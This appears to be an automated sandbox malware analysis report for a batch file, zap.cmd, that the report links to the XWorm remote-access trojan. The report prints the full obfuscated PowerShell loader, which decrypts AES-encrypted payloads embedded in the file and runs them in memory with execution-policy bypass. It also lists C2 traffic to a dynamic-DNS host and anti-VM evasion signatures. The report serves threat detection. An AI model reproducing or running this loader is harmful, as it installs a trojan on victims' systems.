Edit tour

Windows Analysis Report
zap.cmd

Overview

General Information

Sample name:	zap.cmd
Analysis ID:	1446782
MD5:	85c9311ae0014ac8bb98089d0bd51bdc
SHA1:	5140e9beda6014b02df3c09f84a284f9c25532ca
SHA256:	152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
Tags:	cmd
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Bypasses PowerShell execution policy

Obfuscated command line found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses dynamic DNS services

Very long command line found

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4692 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3468 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 4044 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 5604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

wermgr.exe (PID: 3796 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)

cleanup

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6412, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, ProcessId: 5604, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6412, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, ProcessId: 5604, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6412, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass, ProcessId: 5604, ProcessName: powershell.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 12.202.180.134 - Destination IP: 192.168.2.7

Timestamp:	05/23/24-21:08:05.951304
SID:	2852870
Source Port:	8896
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.7 - Destination IP: 12.202.180.134

Timestamp:	05/23/24-21:06:17.058409
SID:	2855924
Source Port:	49701
Destination Port:	8896
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.7 - Destination IP: 12.202.180.134

Timestamp:	05/23/24-21:08:05.057435
SID:	2852923
Source Port:	49701
Destination Port:	8896
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.7 - Destination IP: 12.202.180.134

Timestamp:	05/23/24-21:07:43.385208
SID:	2853193
Source Port:	49701
Destination Port:	8896
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 12.202.180.134 - Destination IP: 192.168.2.7

Timestamp:	05/23/24-21:08:05.951304
SID:	2852874
Source Port:	8896
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source:	Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1275619823.000001A8EF768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDQ7Q source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb\|w source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb( source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbp;8 source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1277542493.000001A8EFA49000.00000004.00000020.00020000.00000000.sdmp

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 12.202.180.134:8896 -> 192.168.2.7:49701
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 12.202.180.134:8896 -> 192.168.2.7:49701
Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 12.202.180.134:8896
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.7:49701 -> 12.202.180.134:8896
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 12.202.180.134:8896

Uses dynamic DNS services

Source: unknown

DNS query: name: hjxwrm5.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.7:49701 -> 12.202.180.134:8896

Source: Joe Sandbox View

IP Address: 12.202.180.134 12.202.180.134

Source: Joe Sandbox View

ASN Name: FISERV-INCUS FISERV-INCUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: hjxwrm5.duckdns.org

Source: powershell.exe, 00000009.00000002.1255405445.000001A8D7ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E78C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D7701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D7701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D929A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D8642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D9410000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1255405445.000001A8D79E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E78C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1270821685.000001A8E778A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1255405445.000001A8D90D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

System Summary

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2198
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2198			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCACBFB	9_2_00007FFAACCACBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCAF8D8	9_2_00007FFAACCAF8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCBDCA0	9_2_00007FFAACCBDCA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFAACCA7CA0	9_2_00007FFAACCA7CA0

Source: classification engine

Classification label: mal88.troj.evad.winCMD@17/11@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSmkrgH8xVI2Dczk

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qg1oghzr.2er.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\zap.cmd"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\zap.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5604" "1360" "1232" "2560" "0" "0" "1348" "0" "0" "0" "0" "0"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
